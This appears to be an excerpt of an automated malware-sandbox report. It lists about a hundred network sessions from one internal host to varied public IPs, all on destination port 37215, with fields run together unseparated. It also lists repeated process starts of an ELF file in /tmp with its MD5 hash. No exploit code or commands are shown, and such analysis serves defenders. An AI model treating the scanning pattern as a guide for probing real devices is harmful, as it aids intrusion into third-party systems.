                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29310192.168.2.1547874121.134.207.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29311192.168.2.1546720122.103.148.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29312192.168.2.154728645.153.5.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29313192.168.2.155319431.56.34.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29314192.168.2.153377294.150.48.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29315192.168.2.153565441.139.82.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29316192.168.2.154803831.124.91.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29317192.168.2.1549942121.169.9.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29318192.168.2.1556888156.214.14.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29319192.168.2.1555710197.69.34.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29320192.168.2.1548582221.167.49.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29321192.168.2.1547800122.54.208.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29322192.168.2.1533448197.2.17.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29323192.168.2.1554132190.210.226.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29324192.168.2.1559406138.55.152.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29325192.168.2.154237845.57.207.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29326192.168.2.154079231.106.190.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29327192.168.2.1553590122.100.154.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29328192.168.2.1557110190.217.39.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29329192.168.2.156091894.59.194.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29330192.168.2.1549148121.3.201.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29331192.168.2.1556972181.196.223.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29332192.168.2.154613845.206.42.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29333192.168.2.1534808156.228.105.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29334192.168.2.154061841.133.160.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29335192.168.2.153392645.3.196.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29336192.168.2.1542022157.156.43.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29337192.168.2.153683837.118.19.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29338192.168.2.155534837.89.113.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29339192.168.2.154435845.6.223.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29340192.168.2.153386431.161.83.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29341192.168.2.1548570181.188.252.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29342192.168.2.1553332222.85.224.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29343192.168.2.1543894138.172.6.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29344192.168.2.154568831.74.196.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29345192.168.2.1533132138.114.230.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29346192.168.2.1541130190.99.253.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29347192.168.2.1535380190.178.253.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29348192.168.2.1551460122.231.183.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29349192.168.2.154943637.83.61.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29350192.168.2.1551452186.238.74.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29351192.168.2.154808294.132.96.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29352192.168.2.1548076186.190.223.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29353192.168.2.1542776121.77.85.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29354192.168.2.155281645.83.145.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29355192.168.2.154913037.59.112.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29356192.168.2.1544130121.24.19.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29357192.168.2.1537002122.120.200.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29358192.168.2.1542146122.43.2.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29359192.168.2.155544494.122.179.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29360192.168.2.153870037.75.116.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29361192.168.2.1533798181.203.199.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29362192.168.2.154754231.133.75.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29363192.168.2.1548262114.3.48.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29364192.168.2.1541268156.116.60.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29365192.168.2.1552160190.209.5.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29366192.168.2.155302431.86.111.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29367192.168.2.153571837.145.25.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29368192.168.2.155620237.88.99.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29369192.168.2.153588645.238.172.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29370192.168.2.1547758222.89.209.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29371192.168.2.1551234157.49.62.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29372192.168.2.1539658121.115.56.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29373192.168.2.1554582181.155.83.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29374192.168.2.1546148138.60.45.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29375192.168.2.1548306122.203.245.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29376192.168.2.1560802138.232.125.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29377192.168.2.154014645.153.150.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29378192.168.2.1538312156.154.112.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29379192.168.2.1541226197.93.202.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29380192.168.2.1557610222.39.125.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29381192.168.2.1537396197.217.148.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29382192.168.2.155391245.204.137.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29383192.168.2.155613845.144.132.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29384192.168.2.1537576102.36.219.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29385192.168.2.1532862222.84.59.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29386192.168.2.1533474121.165.91.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29387192.168.2.1556306197.61.170.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29388192.168.2.1551542190.36.20.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29389192.168.2.155217045.61.27.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29390192.168.2.1540032156.34.3.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29391192.168.2.1548386121.34.165.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29392192.168.2.1538614121.164.148.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29393192.168.2.154145837.155.163.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29394192.168.2.155802041.148.141.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29395192.168.2.1560762121.4.111.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29396192.168.2.1545604186.12.19.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29397192.168.2.1536692156.29.110.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29398192.168.2.1554424157.1.166.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29399192.168.2.1548306122.49.206.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29400192.168.2.1559306121.28.92.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29401192.168.2.155616237.203.84.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29402192.168.2.1543704190.195.228.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29403192.168.2.1547906222.220.11.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29404192.168.2.154155641.229.168.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29405192.168.2.1541066121.197.218.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29406192.168.2.1560146122.74.77.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29407192.168.2.1545374138.11.3.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29408192.168.2.154525441.47.193.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29409192.168.2.1534250222.104.98.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29410192.168.2.1559034102.119.196.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29411192.168.2.155094441.158.64.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29412192.168.2.1533154156.146.151.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29413192.168.2.1553534197.146.196.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29414192.168.2.1553724156.53.110.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29415192.168.2.1536446156.48.216.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29416192.168.2.1535072197.75.239.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29417192.168.2.1560692197.95.10.9937215
                                              TimestampBytes transferredDirectionData


                                              System Behavior

                                              Start time (UTC):14:33:09
                                              Start date (UTC):09/06/2024
                                              Path:/tmp/bVMuPnsMIq.elf
                                              Arguments:/tmp/bVMuPnsMIq.elf
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):14:33:09
                                              Start date (UTC):09/06/2024
                                              Path:/tmp/bVMuPnsMIq.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):14:33:09
                                              Start date (UTC):09/06/2024
                                              Path:/tmp/bVMuPnsMIq.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):14:33:09
                                              Start date (UTC):09/06/2024
                                              Path:/tmp/bVMuPnsMIq.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                              Start time (UTC):14:33:09
                                              Start date (UTC):09/06/2024
                                              Path:/tmp/bVMuPnsMIq.elf
                                              Arguments:-
                                              File size:4956856 bytes
                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1